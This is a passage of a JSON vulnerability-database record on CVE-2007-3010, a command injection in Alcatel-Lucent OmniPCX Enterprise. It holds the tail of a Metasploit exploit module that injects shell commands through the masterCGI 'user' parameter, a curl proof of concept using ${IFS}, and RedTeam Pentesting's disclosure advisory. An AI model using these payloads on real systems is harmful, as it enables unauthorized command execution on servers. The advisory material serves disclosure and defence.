This\r\n\t\t\t\tmodule only supports command line payloads, as the httpd process kills\r\n\t\t\t\tthe reverse/bind shell spawn after the HTTP 200 OK response.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'patrick' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision$',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'OSVDB', '40521' ],\r\n\t\t\t\t\t[ 'BID', '25694' ],\r\n\t\t\t\t\t[ 'CVE', '2007-3010' ],\r\n\t\t\t\t\t[ 'URL', 'http://www1.alcatel-lucent.com/psirt/statements/2007002/OXEUMT.htm' ],\r\n\t\t\t\t],\r\n\t\t\t'Platform' => ['unix'],\r\n\t\t\t'Arch' => ARCH_CMD,\t\t\t\t\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'PayloadType' => 'cmd',\r\n\t\t\t\t\t\t\t'RequiredCmd' => 'generic'\r\n\t\t\t\t\t\t}\r\n\t\t\t\t},\r\n\t\t\t'Targets' => \r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic Target', { }]\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0))\r\n\t\t\t\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOpt::RPORT(443),\r\n\t\t\t\t\tOptBool.new('SSL', [true, 'Use SSL', true]),\r\n\t\t\t\t], self.class)\r\n\tend\r\n\t\r\n\tdef exploit\r\n\t\tconnect\r\n\r\n\t\tcmd = payload.encoded.gsub(\" \", '${IFS}')\r\n\t\treq = \r\n\t\t\t\"GET /cgi-bin/masterCGI?ping=nomip&user=;#{cmd}; HTTP/1.1\\r\\n\" +\r\n\t\t\t\"Host: #{rhost}\\r\\n\\r\\n\"\r\n\t\t\r\n\t\tprint_status(\"Sending GET request with command line payload...\")\r\n\t\tsock.put(req)\r\n\r\n\t\tres = sock.get(3,3)\r\n\r\n\t\tif (res =~ /<h5>(.*)<\\/h5>/smi)\r\n\t\t\tout = $1\r\n\t\t\tprint_line(out.gsub(/<h5>|<\\/h5>/, ''))\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/10031/"}, {"lastseen": "2016-02-03T12:40:48", "description": "Alcatel-Lucent OmniPCX Enterprise 7.1 
Remote Command Execution Vulnerability. CVE-2007-3010. Webapps exploit for cgi platform", "published": "2007-09-17T00:00:00", "type": "exploitdb", "title": "Alcatel-Lucent OmniPCX Enterprise <= 7.1 - Remote Command Execution Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-3010"], "modified": "2007-09-17T00:00:00", "id": "EDB-ID:30591", "href": "https://www.exploit-db.com/exploits/30591/", "sourceData": "source: http://www.securityfocus.com/bid/25694/info\r\n\r\nAlcatel-Lucent OmniPCX Enterprise is prone to a remote command-execution vulnerability because it fails to adequately sanitize user-supplied data.\r\n\r\nAttackers can exploit this issue to execute arbitrary commands with the privileges of the 'httpd' user. Successful attacks may facilitate a compromise of the application and underlying webserver; other attacks are also possible.\r\n\r\nAlcatel-Lucent OmniPCX Enterprise R7.1 and prior versions are vulnerable to this issue. \r\n\r\ncurl -k \"https://www.example.com/cgi-bin/masterCGI?ping=nomip&user=;ls\\${IFS}-l;\" ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/30591/"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:27", "bulletinFamily": "software", "cvelist": ["CVE-2007-3010"], "description": "Code execution in Web interface.", "edition": 1, "modified": "2007-09-19T00:00:00", "published": "2007-09-19T00:00:00", "id": "SECURITYVULNS:VULN:8163", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:8163", "title": "Alcatel-Lucent OmniPCX code execution", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:23", "bulletinFamily": "software", "cvelist": ["CVE-2007-3010"], "description": "Advisory: Alcatel-Lucent OmniPCX Remote Command Execution\r\n\r\nRedTeam Pentesting discovered a remote command execution in 
the\r\nAlcatel-Lucent OmniPCX during a penetration test. The masterCGI script\r\nof the OmniPXC integrated communication solution web interface is\r\nvulnerable to a remote command execution. Attackers can run arbitrary\r\ncommands with the permissions of the web application user.\r\n\r\n\r\nDetails\r\n=======\r\n\r\nProduct: Alcatel-Lucent OmniPCX\r\nAffected Versions: All versions up to and including R7.1\r\nFixed Versions: All supported versions\r\nVulnerability Type: Remote Command Execution\r\nSecurity-Risk: high\r\nVendor-URL: http://www1.alcatel-lucent.com/psirt/statements.htm\r\n reference number 2007002\r\nVendor-Status: Informed, patch available\r\nAdvisory-URL: http://www.redteam-pentesting.de/advisories/rt-sa-2007-001.php\r\nAdvisory-Status: public\r\nCVE: CVE-2007-3010\r\nCVE-URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3010\r\n\r\n\r\nIntroduction\r\n============\r\n\r\n"The OmniPCX Enterprise is an integrated communications solution for\r\nmedium-sized businesses and large corporations. It combines the best of\r\nthe old (legacy TDM phone connectivity) with the new (a native IP\r\nplatform and support for Session Initiation Protocol, or SIP) to provide\r\nan effective and complete communications solution for cost-conscious\r\ncompanies on the cutting edge."\r\n\r\n(from the vendor's homepage)\r\n\r\n\r\nMore Details\r\n============\r\n\r\nThe OmniPCX web interface has a CGI script "masterCGI" which offers a\r\n"ping" functionality. By running the script with the parameters "ping"\r\nand "user", one is able to ping any IP address reachable from the server\r\nthe webinterface is running on.\r\n\r\ncurl -k "https://www.example.com/cgi-bin/masterCGI?ping=nomip&user=127.0.0.1"\r\n\r\nThe ping will be done on the server, running the ping program installed\r\non it. The vulnerability lies in the "user" variable not being filtered\r\nwhen passed to the shell. 
Thus, arbitrary commands can be executed on\r\nthe server by adding them to the user variable, separated by semicolons.\r\nSpaces have to be encoded by using the internal field separator ${IFS},\r\nas any normal or URL encoded space will abort the command execution.\r\n\r\n\r\nProof of Concept\r\n================\r\n\r\ncurl -k "https://www.example.com/cgi-bin/masterCGI?ping=nomip&user=;ls\${IFS}-l;"\r\n\r\n\r\nWorkaround\r\n==========\r\n\r\nDeactivate the Web server at the loss of some functionality not related\r\nto telephony service. Interpose a firewall allowing access to the web\r\ninterface of the OXE to IP addresses who should have access to the\r\nserver (e.g. maintenance technicians).\r\n\r\n\r\nFix\r\n===\r\n\r\nCorrect filtering of shell meta-characters and tighter access control\r\nhave been implemented in all supported versions.\r\n\r\n\r\nSecurity Risk\r\n=============\r\n\r\nThe risk of this vulnerability is high. Any user which has access to the\r\nweb interface of the OmniPCX Enterprise solution will be able to execute\r\narbitrary commands on the server with the permissions of the webserver.\r\n\r\n\r\nHistory\r\n=======\r\n\r\n2007-05-07 First contact with head of technical staff of Alcatel-Lucent. 
\r\n Will relay the information to their technicians and call back \r\n with further information.\r\n2007-05-09 Response with a pointer to the Alcatel-Lucent PSIRT and the\r\n website http://www1.alcatel-lucent.com/psirt, where the\r\n process of reporting a security vulnerability is explained.\r\n The advisory gets mailed to the email address provided there.\r\n2007-05-10 Advisory gets acknowledged by the PSIRT\r\n2007-05-23 Vulnerability gets confirmed by Alcatel-Lucent\r\n2007-06-18 CVE number assigned\r\n2007-09-17 Coordinated public release with Alcatel-Lucent\r\n\r\n\r\nReferences\r\n==========\r\n\r\nhttp://www1.alcatel-lucent.com/psirt/statements.htm\r\nreference number 2007002\r\n\r\n\r\nRedTeam Pentesting GmbH\r\n=======================\r\n\r\nRedTeam Pentesting is offering individual penetration tests, short\r\npentests, performed by a team of specialised IT-security experts.\r\nHereby, security weaknesses in company networks or products are\r\nuncovered and can be fixed immediately.\r\n\r\nAs there are only few experts in this field, RedTeam Pentesting wants to\r\nshare its knowledge and enhance the public knowledge with research in\r\nsecurity related areas. The results are made available as public\r\nsecurity advisories.\r\n\r\nMore information about RedTeam Pentesting can be found at\r\nhttp://www.redteam-pentesting.de.\r\n\r\n-- \r\nRedTeam Pentesting GmbH Tel.: +49 241 963-1300\r\nDennewartstr. 25-27 Fax : +49 241 963-1304\r\n52068 Aachen http://www.redteam-pentesting.de/\r\nGermany Registergericht: Aachen HRB 14004\r\nGeschaftsfuhrer: Patrick Hof, Jens Liebchen, Claus R. F. 
Overbeck", "edition": 1, "modified": "2007-09-19T00:00:00", "published": "2007-09-19T00:00:00", "id": "SECURITYVULNS:DOC:18015", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:18015", "title": "Alcatel-Lucent OmniPCX Remote Command Execution", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2020-10-06T05:18:56", "description": "This module abuses a metacharacter injection vulnerability in the HTTP management interface of the Alcatel-Lucent OmniPCX Enterprise Communication Server 7.1 and earlier. The Unified Maintenance Tool contains a 'masterCGI' binary which allows an unauthenticated attacker to execute arbitrary commands by specifying shell metacharacters as the 'user' within the 'ping' action to obtain 'httpd' user access. This module only supports command line payloads, as the httpd process kills the reverse/bind shell spawn after the HTTP 200 OK response.\n", "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-3010"], "modified": "1976-01-01T00:00:00", "id": "MSF:EXPLOIT/LINUX/HTTP/ALCATEL_OMNIPCX_MASTERCGI_EXEC", "href": "", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb"}]}